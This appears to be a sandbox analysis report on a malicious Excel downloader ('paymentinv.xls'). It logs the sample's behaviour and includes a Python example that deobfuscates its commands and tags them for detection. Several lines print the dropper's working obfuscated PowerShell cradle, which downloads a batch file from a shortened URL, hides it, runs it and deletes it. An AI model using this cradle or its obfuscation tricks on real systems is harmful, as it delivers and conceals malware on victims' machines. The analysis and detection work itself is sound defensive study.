00:08:671 File Operations (miscellaneous) Searched a directory for the name: C:\ProgramData\Oracle\Java\javapath\attrib.JS

00:08:671 File Operations (miscellaneous) Searched a directory for the name: C:\Windows\system32\attrib.psm1

00:08:671 Files Read C:\Windows\system32\attrib.exe

00:08:671 File Operations (miscellaneous) Searched a directory for the name: C:\ProgramData\Oracle\Java\javapath\attrib.BAT

00:08:671 File Operations (miscellaneous) Searched a directory for the name: C:\ProgramData\Oracle\Java\javapath\attrib.CMD

00:08:671 File Operations (miscellaneous) Searched a directory for the name: C:\ProgramData\Oracle\Java\javapath\attrib.COM

00:08:671 Files Read C:\Windows\system32

00:08:671 File Operations (miscellaneous) Searched a directory for the name: C:\ProgramData\Oracle\Java\javapath\attrib.EXE

00:08:671 File Operations (miscellaneous) Searched a directory for the name: C:\Windows\system32\attrib.psd1

00:08:687 Process Created "c:\windows\system32\attrib.exe" +s +h pd.bat

00:08:718 Others Retrieved information about a locale specified by an identifier

00:08:734 Process killed Ended itself and all of its threads

00:08:734 Process Operations (miscellaneous) Enabled an application to supersede the top-level exception handler

00:08:765 Files Deleted C:\Windows\Microsoft.NET\Framework\v2.0.50727\config\security.config.cch.2540.4059203

00:08:765 Files Deleted C:\Windows\Microsoft.NET\Framework\v2.0.50727\config\enterprisesec.config.cch.2540.4059203

00:08:765 Process killed Ended itself and all of its threads

00:08:765 Files Deleted C:\Users\Administrator\AppData\Roaming\Microsoft\CLR Security Config\v2.0.50727.312\security.config.cch.2540.4059218

00:10:875 Files Deleted C:\Windows\Microsoft.NET\Framework\v2.0.50727\config\enterprisesec.config.cch.2548.4059203

00:10:875 Files Deleted C:\Windows\Microsoft.NET\Framework\v2.0.50727\config\security.config.cch.2548.4059203

00:10:875 Files Deleted C:\Users\Administrator\AppData\Roaming\Microsoft\CLR Security Config\v2.0.50727.312\security.config.cch.2548.4059203

00:13:062 Files Modified C:\dgwseciilw\254f614b-21fd-47d9-99c3-f23fd434845c.xls, attribute: Normal

00:13:187 Files Created C:\Users\Administrator\AppData\Roaming\Microsoft\Office\Excel12.pip (access: Write, attributes: 8100000)

00:13:265 Process killed Ended itself and all of its threads

00:13:265 Files Deleted C:\Users\ADMINI~1\AppData\Local\Temp\55078.od

00:13:265 Files Deleted C:\Users\ADMINI~1\AppData\Local\Temp\CVRD726.tmp.cvr

00:13:281 Process Operations (miscellaneous) Set a waiting mode until a specified object is in the signaled state or the time-out interval elapses

00:14:781 File Operations (miscellaneous) Searched a directory for the name: C:\Users\Administrator\Documents\pd.bat

00:14:781 Process Created "c:\users\administrator\documents\pd.bat"

00:14:781 Files Read C:\Users\Administrator\Documents\pd.bat

00:14:796 Process Created "c:\users\admini~1\docume~1\pd.bat" "c:\users\administrator\documents\pd.bat"

00:14:875 Process Created {6C467336-8281-4E60-8204-430CED96822D}

00:14:890 Process Created {E0629351-6F81-11D2-973F-00104B9B172F}

00:14:890 Process Created {8F170678-2A97-4D59-89A1-7A0A71C1B677}

00:14:890 Process Created {71C3BF7F-682F-4B5E-9E47-5C25D3AC9458}

00:14:906 Process Created {E97F7176-7C91-4648-A0CE-94F37BF016F8}

00:14:906 Process Created {25CD009F-FFBF-418A-8E11-7A877CAFCAF5}

00:14:906 Process Created {50EE5B75-5635-11D1-AC2A-D4EA0B000000}

00:14:906 Process Created {55C7A567-7B90-4885-9EDD-662D359ED389}

00:14:906 Process Created {6D49AC84-BEAD-11D1-A074-0080C740BFBD}

00:14:906 Process Created {7353C207-C0DA-45A1-93CC-47A853A736A1}

00:14:906 Process Created {F5078F32-C551-11D3-89B9-0000F81FE221}

00:14:906 Process Created {EFDB41B0-5538-42F1-995B-460DA31C0924}

00:14:921 Process Created {7B8A2D94-0AC9-11D1-896C-00C04FB6BFC4}

00:14:954 Registry Read HKCR\CLSID\{0A29FF9E-7F9C-4437-8B11-F424491E3931}\Server Default

00:14:954 Registry Read HKCR\CLSID\{0A29FF9E-7F9C-4437-8B11-F424491E3931}\InprocServer32 Default

00:14:954 Registry Opened HKCR\CLSID\{0A29FF9E-7F9C-4437-8B11-F424491E3931}\InprocServer32

00:14:954 Registry Opened HKCR\CLSID\{0A29FF9E-7F9C-4437-8B11-F424491E3931}\Server

00:14:954 Process Opened Executed a shell command c:\users\administrator\documents\pd.bat

00:15:125 Files Deleted C:\Windows\Microsoft.NET\Framework\v2.0.50727\config\security.config.cch.2804.4059203

00:15:125 Files Deleted C:\Windows\Microsoft.NET\Framework\v2.0.50727\config\enterprisesec.config.cch.2804.4059203

00:15:125 Files Deleted C:\Users\Administrator\AppData\Roaming\Microsoft\CLR Security Config\v2.0.50727.312\security.config.cch.2804.4059203

00:15:140 Process Operations (miscellaneous) Set a waiting mode until a specified object is in the signaled state or the time-out interval elapses

00:15:140 Process killed Ended itself and all of its threads

00:19:687 File Operations (miscellaneous) Searched a directory for the name: C:\Users\Administrator\Documents\pd.bat\*

00:19:704 Files Modified C:\Users\Administrator\Documents\pd.bat, attribute: Archive

00:19:704 Files Deleted C:\Users\Administrator\Documents\pd.bat

Engine Analysis

Engine Threat Name Severity

GTI File Reputation TYPE_TROJAN ⬤ 5 - Very High

GTI URL Reputation

Gateway Anti-Malware W97M/Downloader.czq ⬤ 5 - Very High

Anti-Malware --- ⬤ Unverified

YARA

Custom Rules

Sandbox Malware.Dynamic ⬤ 5 - Very High

Final ⬤ 5 - Very High

Sample is malicious: final severity level 5

Embedded/Dropped content

MD5 Name Category

0DAC27616DC859C94A6CC2E7FBEFEC3D Excel12.pip * ---

D5801B4565D86068F3B2CC2EE906017F X43D78XIIKCRAJNR9GZN.temp * ---

* Attachments were extracted from the sample file and stored in the dropfiles.zip

Screenshots

Note: a pop-up window was detected during dynamic analysis so user interaction may be required in order to fully analyze this sample

Images: 2
f50e.jpg

fcfd.jpg

paymentinv.xls

Run-Time Dlls: 5
api-ms-win-appmodel-runtime-l1-1-0.dll

mso.dll

comctl32.dll

shlwapi.dll

version.dll

File Operations: 27

Files Created

File Name Access Mode File Attributes

C:\Users\Administrator\AppData\Roaming\Microsoft\Office\Excel12.pip Write 8100000

Files Opened

File Name Access Mode File Attributes

C:\Program Files (x86)\Microsoft Office\Office12\EXCEL.EXE.config Read Normal

C:\Windows\Microsoft.NET\Framework\\v1.0.3705\clr.dll 20000 10000000

C:\Windows\Microsoft.NET\Framework\\v1.0.3705\mscorwks.dll 20000 10000000

C:\Windows\Microsoft.NET\Framework\\v1.1.4322\clr.dll 20000 10000000

C:\Windows\Microsoft.NET\Framework\\v1.1.4322\mscorwks.dll 20000 10000000

C:\Windows\Microsoft.NET\Framework\\v2.0.50727\clr.dll 20000 10000000

C:\Windows\Microsoft.NET\Framework\\v2.0.50727\mscorwks.dll 20000 10000000

C:\Windows\Microsoft.NET\Framework\\v4.0.30319\clr.dll 20000 10000000

Files Deleted

C:\Users\ADMINI~1\AppData\Local\Temp\55078.od
C:\Users\ADMINI~1\AppData\Local\Temp\CVRD726.tmp.cvr
C:\Users\Administrator\AppData\Local\Microsoft\Schemas\MS Excel_restart.xml

C:\Users\Administrator\AppData\Roaming\Microsoft\Office\Recent\254f614b-21fd-47d9-99c3-f23fd434845c.LNK

C:\Users\Administrator\AppData\Roaming\Microsoft\Office\Recent\dgwseciilw.LNK

Files Modified

Source File Destination File/Write Written

C:\dgwseciilw\254f614b-21fd-47d9-99c3-f23fd434845c.xls, attribute: Normal

Files Read

C:\Windows\Microsoft.NET\Framework\

C:\Windows\Microsoft.NET\Framework\v2.0.50727

C:\dgwseciilw\254f614b-21fd-47d9-99c3-f23fd434845c.xls

Other

Determined whether a disk drive C:\ is a removable, fixed, CD-ROM, RAM disk, or network drive

Obtained a set of FAT file system attributes for a file or directory

Obtained the current directory for the current process

Obtained the path of the Windows system directory

Retrieved the full path for the module

Searched a directory for the name: C:\Program Files (x86)\Microsoft Office\Office12\xlstart\*.*

Searched a directory for the name: C:\Users\Administrator\AppData\Roaming\Microsoft\Excel\XLSTART\*.*

Searched a directory for the name: C:\Windows\Microsoft.NET\Framework\\*

Searched a directory for the name: C:\dgwseciilw\254f614b-21fd-47d9-99c3-f23fd434845c.xls

Registry Operations: 14

Registry Opened

HKCU\SOFTWARE\Microsoft\Office Test\Special\Perf

HKCU\Software\Microsoft\.NETFramework

HKCU\Software\Microsoft\Office\12.0\Excel

HKLM\SOFTWARE\Microsoft\Fusion

HKLM\Software\Microsoft\.NETFramework

HKLM\Software\Microsoft\.NETFramework\Policy\Upgrades

HKLM\Software\Microsoft\Windows\CurrentVersion

Registry Read

HKCU\Software\Microsoft\Office\12.0\Excel DisableThreadAffinity

HKLM\SOFTWARE\Microsoft\Fusion NoClientChecks

HKLM\Software\Microsoft\.NETFramework InstallRoot

HKLM\Software\Microsoft\.NETFramework OnlyUseLatestCLR

HKLM\Software\Microsoft\.NETFramework UseLegacyV2RuntimeActivationPolicyDefaultValue

HKLM\Software\Microsoft\Windows\CurrentVersion CommonFilesDir

Other

Enumerated the values for an open registry key

Process Operations: 26

Process Created

Process Name Module

cmd /c powershe^l^l -w 1 (new-ob`ject net.webclient).('down'+'loadfile').invoke('https://cutt.ly/rjszlb1','pd.bat')   system

cmd /c powershe^l^l -w 1 start`-sle`ep 12; remove-item -path pd.bat -force   system

cmd /c powershe^l^l -w 1 start`-sle`ep 1; attrib +s +h pd.bat   system

cmd /c powershe^l^l -w 1 start`-sle`ep 3; move-item "pd.bat" -destination "$e`nv:t`emp"   system

cmd /c powershe^l^l -w 1 start`-sle`ep 7;cd "$e`nv:t`emp; ./pd.bat"   system

{0E5AAE11-A475-4C5B-AB00-C66DE400274E}

{1F486A52-3CB1-48FD-8F50-B8DC300D9F9D}

{7B8A2D94-0AC9-11D1-896C-00C04FB6BFC4}

{88D969EC-8B8B-4C3D-859E-AF6CD158BE0F}

{88D969EF-F192-11D4-A65F-0040963251E5}

{C1EE01F2-B3B6-4A6A-9DDD-E988C088EC82}

{DFFACDC5-679F-4156-8947-C5C76BC0B67F}

{FA445657-9379-11D6-B41A-00065B83EE53}

Process killed

Ended itself and all of its threads

Thread Created

2f70368f

Other

Changed the protection attribute of process address: 0x2f7830dc, new attribute: Execute_Read

Changed the protection attribute of process address: 0x2f7830dc, new attribute: Execute_ReadWrite

Deactivated the activation context corresponding to the specified cookie

Initialized COM library for the current thread and set it in the concurrency mode

Install a new hook procedure (type: WH_KEYBOARD)

Install a new hook procedure (type: WH_MSGFILTER)

Obtained the contents of the specified variable from the environment block of the calling process

Obtained the identifier of the thread or process that created the specified window

Queried the activation context

Retrieved information on a specific string in the current activation context

Set a waiting mode until a specified object is in the signaled state or the time-out interval elapses

Network Operations: 1

Socket Activities

Retrieved the name of the network resource associated with a local device

Other Operations: 5

Others

Initialized a critical section object and set the spin count for the critical section

Obtained the current system date and time in in Coordinated Universal Time (UTC) format

Obtained the system metric or system configuration setting

Recorded system information

Retrieved the current local date and time

cmd.exe

File Operations: 22

Files Read

C:\Users\Administrator\Documents

Other

Determined whether a disk drive C:\ is a removable, fixed, CD-ROM, RAM disk, or network drive

Obtained a set of FAT file system attributes for a file or directory

Obtained the current directory for the current process

Retrieved the full path for the module

Searched a directory for the name: C:\ProgramData\Oracle\Java\javapath\powershell.*


Searched a directory for the name: C:\ProgramData\Oracle\Java\javapath\powershell

Searched a directory for the name: C:\Users

Searched a directory for the name: C:\Users\Administrator

Searched a directory for the name: C:\Users\Administrator\Documents

Searched a directory for the name: C:\Users\Administrator\Documents\powershell.*

Searched a directory for the name: C:\Users\Administrator\Documents\powershell

Searched a directory for the name: C:\Windows\System32\Wbem\powershell.*

Searched a directory for the name: C:\Windows\System32\Wbem\powershell

Searched a directory for the name: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.*

Searched a directory for the name: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.COM

Searched a directory for the name: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE

Searched a directory for the name: C:\Windows\powershell.*

Searched a directory for the name: C:\Windows\powershell

Searched a directory for the name: C:\Windows\system32\powershell.*

Searched a directory for the name: C:\Windows\system32\powershell

Registry Operations: 17

Registry Opened

HKCU\Software\Microsoft\Command Processor

HKCU\Software\Policies\Microsoft\Windows\System

HKLM\Software\Microsoft\Command Processor

Registry Read

HKCU\Software\Microsoft\Command Processor AutoRun

HKCU\Software\Microsoft\Command Processor CompletionChar

HKCU\Software\Microsoft\Command Processor DefaultColor

HKCU\Software\Microsoft\Command Processor DelayedExpansion

HKCU\Software\Microsoft\Command Processor DisableUNCCheck

HKCU\Software\Microsoft\Command Processor EnableExtensions

HKCU\Software\Microsoft\Command Processor PathCompletionChar

HKLM\Software\Microsoft\Command Processor AutoRun

HKLM\Software\Microsoft\Command Processor CompletionChar

HKLM\Software\Microsoft\Command Processor DefaultColor

HKLM\Software\Microsoft\Command Processor DelayedExpansion

HKLM\Software\Microsoft\Command Processor DisableUNCCheck

HKLM\Software\Microsoft\Command Processor EnableExtensions

HKLM\Software\Microsoft\Command Processor PathCompletionChar

Process Operations: 9

Process Created

Process Name Module

powershell -w 1 (new-ob`ject net.webclient).('down'+'loadfile').invoke('https://cutt.ly/rjszlb1','pd.bat')   c:\windows\system32\windowspowershell\v1.0\powershell.exe

powershell -w 1 start`-sle`ep 12; remove-item -path pd.bat -force   c:\windows\system32\windowspowershell\v1.0\powershell.exe

powershell -w 1 start`-sle`ep 1; attrib +s +h pd.bat   c:\windows\system32\windowspowershell\v1.0\powershell.exe

powershell -w 1 start`-sle`ep 3; move-item "pd.bat" -destination "$e`nv:t`emp"   c:\windows\system32\windowspowershell\v1.0\powershell.exe

powershell -w 1 start`-sle`ep 7;cd "$e`nv:t`emp; ./pd.bat"   c:\windows\system32\windowspowershell\v1.0\powershell.exe
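The command lines recorded under Process Created for the Excel-spawned cmd.exe and again for powershell.exe above stack three cheap obfuscation layers: cmd.exe caret escapes (powershe^l^l), PowerShell backticks (new-ob`ject, start`-sle`ep, $e`nv:t`emp) and string concatenation with reflective member access (('down'+'loadfile').invoke). The Python below is an added example, not part of the McAfee ATD report or its output. It normalises each line the way a detection pipeline would before matching, tags the download, hide, stage, execute and clean-up steps, and judges the batch as a sequence. The five sample command lines are copied from the report; the function names, tag names and regexes are this example's own choices.

```python
import re

# Constructed sample input: the five cmd.exe command lines this report lists
# under "Process Created" (the URL is reproduced as an indicator only; do not fetch it).
SAMPLE_CMDLINES = [
    "cmd /c powershe^l^l -w 1 (new-ob`ject net.webclient).('down'+'loadfile').invoke('https://cutt.ly/rjszlb1','pd.bat')",
    "cmd /c powershe^l^l -w 1 start`-sle`ep 12; remove-item -path pd.bat -force",
    "cmd /c powershe^l^l -w 1 start`-sle`ep 1; attrib +s +h pd.bat",
    'cmd /c powershe^l^l -w 1 start`-sle`ep 3; move-item "pd.bat" -destination "$e`nv:t`emp"',
    'cmd /c powershe^l^l -w 1 start`-sle`ep 7;cd "$e`nv:t`emp; ./pd.bat"',
]

_CARET = re.compile(r"\^(.)")                          # cmd.exe escape: ^x is handed to the child as x
_TICK = re.compile(r"`(.)")                            # PowerShell tick inside a word: `x -> x
_CONCAT = re.compile(r"'([^']*)'\s*\+\s*'([^']*)'")    # 'a'+'b' -> 'ab'
_STR_MEMBER = re.compile(r"\.\('([A-Za-z_]\w*)'\)")    # .('name') -> .name
_INVOKE = re.compile(r"\.invoke\(", re.IGNORECASE)     # .name.invoke(args) -> .name(args)


def normalize(cmdline: str) -> str:
    """Strip the obfuscation layers so the line reads as its author intended.

    Backticks are removed wholesale ($e`nv:t`emp -> $env:temp). That follows the
    author's intent, not PowerShell's own escape rules, under which `n inside a
    double-quoted string is a newline.
    """
    s = _CARET.sub(r"\1", cmdline)
    s = _TICK.sub(r"\1", s)
    prev = None
    while prev != s:                     # repeat until no 'a'+'b' pair remains
        prev, s = s, _CONCAT.sub(r"'\1\2'", s)
    s = _STR_MEMBER.sub(r".\1", s)
    return _INVOKE.sub("(", s)


# Tag names are this example's own; each regex runs over the lower-cased normalised line.
RULES = [
    ("download_cradle", r"net\.webclient\)\.download(file|string|data)\("),
    ("hidden_window", r"\s-w(indowstyle)?\s+(1|hidden)\b"),   # -WindowStyle Hidden has the value 1
    ("delay_before_action", r"\bstart-sleep\s+\d+"),
    ("hide_dropped_file", r"\battrib\s+\+[sh]\s+\+[sh]\b"),
    ("stage_to_temp", r"\bmove-item\b.*\$env:temp"),
    ("execute_staged_bat", r"\./\S+\.bat"),
    ("self_cleanup", r"\bremove-item\b.*-force"),
]


def classify(normalized: str) -> list:
    """Return the tags whose regex matches the normalised line, in RULES order."""
    low = normalized.lower()
    return [tag for tag, rx in RULES if re.search(rx, low)]


def analyze(cmdlines) -> list:
    """One record per command line: raw text, normalised text, matched tags."""
    out = []
    for raw in cmdlines:
        norm = normalize(raw)
        out.append({"raw": raw, "normalized": norm, "tags": classify(norm)})
    return out


def chain_verdict(records) -> str:
    """Judge the batch as a whole: each line alone is unremarkable, the sequence is not."""
    seen = {t for r in records for t in r["tags"]}
    if {"download_cradle", "execute_staged_bat"} <= seen and seen & {"hide_dropped_file", "self_cleanup"}:
        return "download-stage-execute-cleanup chain"
    if "download_cradle" in seen:
        return "download cradle"
    return "no match"


if __name__ == "__main__":
    records = analyze(SAMPLE_CMDLINES)
    for r in records:
        print(r["normalized"])
        print("    tags:", ", ".join(r["tags"]) or "-")
    print("verdict:", chain_verdict(records))
```

Two caveats when reusing this against real telemetry. First, matching on the batch rather than on single lines is what makes the verdict robust: the individual commands (a sleep, an attrib, a remove-item) are common in legitimate scripts, while a download cradle followed by hide, stage and delete from the same parent within seconds is not. Second, stripping every backtick gives the intended $env:temp, but PowerShell itself would treat the `n inside "$e`nv:t`emp" as a newline; the timeline above is consistent with the move having failed, since pd.bat is executed from and deleted in C:\Users\Administrator\Documents rather than from %TEMP%. Note also that the fifth command keeps the semicolon inside the double quotes, so the whole string is passed to cd as one path argument.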

Process killed

Ended itself and all of its threads

Other

Enabled an application to supersede the top-level exception handler

Obtained the contents of the specified variable from the environment block of the calling process

Set a waiting mode until a specified object is in the signaled state or the time-out interval elapses

Other Operations: 1

Others

Retrieved information about a locale specified by an identifier

powershell.exe

Run-Time Dlls: 43
advapi32.dll

api-ms-win-appmodel-runtime-l1-1-0.dll

secur32.dll

system.data.dll

system.transactions.dll

shell32.dll

ntdll.dll

psapi.dll

rasapi32.dll

winhttp.dll

ws2_32.dll

microsoft.powershell.commands.utility.ni.dll

microsoft.powershell.commands.diagnostics.ni.dll

microsoft.powershell.security.ni.dll

microsoft.powershell.commands.management.ni.dll

microsoft.powershell.consolehost.ni.dll

microsoft.wsman.management.ni.dll

mscorlib.ni.dll

system.configuration.install.ni.dll

system.configuration.ni.dll

system.core.ni.dll

system.data.ni.dll

system.directoryservices.ni.dll

system.management.automation.ni.dll

system.management.ni.dll

system.transactions.ni.dll

system.xml.ni.dll

system.ni.dll

culture.dll

diasymreader.dll

mscorrc.dll

mscorjit.dll

mscorwks.dll

ole32.dll

oleaut32.dll

gdi32.dll

kernel32.dll

mscoree.dll

ntdll

shfolder.dll

shlwapi.dll

user32.dll
version.dll

File Operations: 155

Files Created

File Name Access Mode File Attributes

C:\Users\Administrator\Documents\pd.bat Write 100000

Files Opened

File Name Access Mode File Attributes

C:\Users\Administrator\AppData\Roaming\Microsoft\CLR Security Config\v2.0.50727.312\security.config.cch Read Normal

C:\Users\Administrator\AppData\Roaming\Microsoft\CLR Security Config\v2.0.50727.312\security.config Read Normal

C:\Windows\Microsoft.NET\Framework\\v1.0.3705\clr.dll 20000 10000000

C:\Windows\Microsoft.NET\Framework\\v1.0.3705\mscorwks.dll 20000 10000000

C:\Windows\Microsoft.NET\Framework\\v1.1.4322\clr.dll 20000 10000000

C:\Windows\Microsoft.NET\Framework\\v1.1.4322\mscorwks.dll 20000 10000000

C:\Windows\Microsoft.NET\Framework\\v2.0.50727\clr.dll 20000 10000000

C:\Windows\Microsoft.NET\Framework\\v2.0.50727\mscorwks.dll 20000 10000000

C:\Windows\Microsoft.NET\Framework\\v4.0.30319\clr.dll 20000 10000000

C:\Windows\Microsoft.NET\Framework\v2.0.50727\Config\machine.config Read 100000

C:\Windows\Microsoft.NET\Framework\v2.0.50727\config\enterprisesec.config.cch Read Normal

C:\Windows\Microsoft.NET\Framework\v2.0.50727\config\enterprisesec.config Read Normal

C:\Windows\Microsoft.NET\Framework\v2.0.50727\config\machine.config Read Normal

C:\Windows\Microsoft.NET\Framework\v2.0.50727\config\security.config.cch Read Normal

C:\Windows\Microsoft.NET\Framework\v2.0.50727\config\security.config Read Normal

C:\Windows\Microsoft.NET\Framework\v2.0.50727\mscorwks.dll 20000 10000000

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Certificate.format.ps1xml Read 8100000

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Diagnostics.Format.ps1xml Read 8100000

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\DotNetTypes.format.ps1xml Read 8100000

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\FileSystem.format.ps1xml Read 8100000

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\GetEvent.types.ps1xml Read 8100000

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Help.format.ps1xml Read 8100000

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\PowerShellCore.format.ps1xml Read 8100000

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\PowerShellTrace.format.ps1xml Read 8100000

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Registry.format.ps1xml Read 8100000

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\WSMan.format.ps1xml Read 8100000

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe.config Read Normal

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\types.ps1xml Read 8100000

C:\Windows\assembly\GAC_32\System.Data\2.0.0.0__b77a5c561934e089\System.Data.dll Read Normal

C:\Windows\assembly\GAC_32\System.Transactions\2.0.0.0__b77a5c561934e089\System.Transactions.dll Read 8000000

C:\Windows\assembly\GAC_32\System.Transactions\2.0.0.0__b77a5c561934e089\System.Transactions.dll Read Normal

C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlp Read Normal

C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlp Read Normal

C:\Windows\assembly\GAC_MSIL\Microsoft.WSMan.Runtime\1.0.0.0__31bf3856ad364e35\Microsoft.WSMan.Runtime.dll Read Normal

C:\Windows\assembly\GAC_MSIL\System.Management.Automation\1.0.0.0__31bf3856ad364e35\System.Management.Automation.dll Read Normal

C:\Windows\assembly\NativeImages_v2.0.50727_32\index127.dat Read Normal

C:\Windows\assembly\pubpol17.dat Read Normal

C:\Windows\system32\l_intl.nls Read Normal

CONOUT$ Read & Write Normal

Files Deleted

C:\Users\Administrator\AppData\Roaming\Microsoft\CLR Security Config\v2.0.50727.312\security.config.cch.2540.4059218

C:\Users\Administrator\AppData\Roaming\Microsoft\CLR Security Config\v2.0.50727.312\security.config.cch.2548.4059203

C:\Users\Administrator\AppData\Roaming\Microsoft\CLR Security Config\v2.0.50727.312\security.config.cch.2804.4059203

C:\Users\Administrator\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\X43D78XIIKCRAJNR9GZN.temp

C:\Users\Administrator\Documents\pd.bat

C:\Windows\Microsoft.NET\Framework\v2.0.50727\config\enterprisesec.config.cch.2540.4059203

C:\Windows\Microsoft.NET\Framework\v2.0.50727\config\enterprisesec.config.cch.2548.4059203

C:\Windows\Microsoft.NET\Framework\v2.0.50727\config\enterprisesec.config.cch.2804.4059203

C:\Windows\Microsoft.NET\Framework\v2.0.50727\config\security.config.cch.2540.4059203

C:\Windows\Microsoft.NET\Framework\v2.0.50727\config\security.config.cch.2548.4059203

C:\Windows\Microsoft.NET\Framework\v2.0.50727\config\security.config.cch.2804.4059203

Files Modified

Source File Destination File/Write Written

C:\Users\Administrator\Documents\pd.bat, attribute: Archive

Files Read

C:\.

C:\

C:\ProgramData\Oracle\Java\javapath

C:\Users

C:\Users\.

C:\Users\Administrator

C:\Users\Administrator\.

C:\Users\Administrator\Documents

C:\Users\Administrator\Documents\.

C:\Users\Administrator\Documents\WindowsPowerShell\Microsoft.PowerShell_profile.ps1

C:\Users\Administrator\Documents\WindowsPowerShell\profile.ps1

C:\Users\Administrator\Documents\pd.bat

C:\Windows\Microsoft.NET\Framework\

C:\Windows\Microsoft.NET\Framework\v2.0.50727

C:\Windows\Microsoft.NET\Framework\v2.0.50727\

C:\Windows\Microsoft.NET\Framework\v2.0.50727\Config\machine.config

C:\Windows\Microsoft.NET\Framework\v2.0.50727\config\machine.config

C:\Windows\Microsoft.NET\Framework\v2.0.50727\mscorlib.dll

C:\Windows\Microsoft.NET\Framework\v2.0.50727\mscorwks.dll

C:\Windows\SysWOW64\WindowsPowerShell\v1.0

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Certificate.format.ps1xml

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Diagnostics.Format.ps1xml

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\DotNetTypes.format.ps1xml

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\FileSystem.format.ps1xml

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\GetEvent.types.ps1xml

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Help.format.ps1xml

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Microsoft.PowerShell_profile.ps1

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\PowerShellCore.format.ps1xml

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\PowerShellTrace.format.ps1xml

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Registry.format.ps1xml

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\WSMan.format.ps1xml

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.config

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\profile.ps1

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\types.ps1xml

C:\Windows\assembly\GAC_32\System.Transactions\2.0.0.0__b77a5c561934e089\System.Transactions.dll

C:\Windows\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Diagnostics\1.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Diagnostics.dll

C:\Windows\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\1.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll

C:\Windows\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility\1.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Utility.dll

C:\Windows\assembly\GAC_MSIL\Microsoft.PowerShell.ConsoleHost\1.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.ConsoleHost.dll

C:\Windows\assembly\GAC_MSIL\Microsoft.PowerShell.Security\1.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Security.dll

C:\Windows\assembly\GAC_MSIL\Microsoft.WSMan.Management\1.0.0.0__31bf3856ad364e35\Microsoft.WSMan.Management.dll

C:\Windows\assembly\GAC_MSIL\System.Configuration.Install\2.0.0.0__b03f5f7f11d50a3a\System.Configuration.Install.dll

C:\Windows\assembly\GAC_MSIL\System.Core\3.5.0.0__b77a5c561934e089\System.Core.dll

C:\Windows\assembly\GAC_MSIL\System.DirectoryServices\2.0.0.0__b03f5f7f11d50a3a\System.DirectoryServices.dll

C:\Windows\assembly\GAC_MSIL\System.Management.Automation\1.0.0.0__31bf3856ad364e35\System.Management.Automation.dll

C:\Windows\assembly\GAC_MSIL\System.Management\2.0.0.0__b03f5f7f11d50a3a\System.Management.dll

C:\Windows\assembly\GAC_MSIL\System.Xml\2.0.0.0__b77a5c561934e089\System.Xml.dll

C:\Windows\assembly\GAC_MSIL\System\2.0.0.0__b77a5c561934e089\System.dll

C:\Windows\system32

C:\Windows\system32\attrib.exe

pd.bat

Memory Mapped Files

Opened a named file-mapping object

Other

Determined whether a disk drive C:\ is a removable, fixed, CD-ROM, RAM disk, or network drive

Obtained a bitmask representing the currently available disk drives

Obtained a set of FAT file system attributes for a file or directory

Obtained information about the file system and volume associated with the root directory

Obtained path of the folder from its CLSID

Obtained the current directory for the current process

Obtained the path of the Windows system directory

Retrieved the full path for the module

Retrieved the path of the Windows directory

Searched a directory for the name: C:\ProgramData\Oracle\Java\javapath\attrib.BAT

Searched a directory for the name: C:\ProgramData\Oracle\Java\javapath\attrib.CMD

Searched a directory for the name: C:\ProgramData\Oracle\Java\javapath\attrib.COM

Searched a directory for the name: C:\ProgramData\Oracle\Java\javapath\attrib.EXE

Searched a directory for the name: C:\ProgramData\Oracle\Java\javapath\attrib.JS

Searched a directory for the name: C:\ProgramData\Oracle\Java\javapath\attrib.JSE

Searched a directory for the name: C:\ProgramData\Oracle\Java\javapath\attrib.MSC

Searched a directory for the name: C:\ProgramData\Oracle\Java\javapath\attrib.VBE

Searched a directory for the name: C:\ProgramData\Oracle\Java\javapath\attrib.VBS

Searched a directory for the name: C:\ProgramData\Oracle\Java\javapath\attrib.WSF

Searched a directory for the name: C:\ProgramData\Oracle\Java\javapath\attrib.WSH

Searched a directory for the name: C:\ProgramData\Oracle\Java\javapath\attrib.ps1

Searched a directory for the name: C:\ProgramData\Oracle\Java\javapath\attrib.psd1

Searched a directory for the name: C:\ProgramData\Oracle\Java\javapath\attrib.psm1

Searched a directory for the name: C:\ProgramData\Oracle\Java\javapath\attrib

Searched a directory for the name: C:\Users\Administrator\Documents\pd.bat

Searched a directory for the name: C:\Users\Administrator\Documents\pd.bat\*

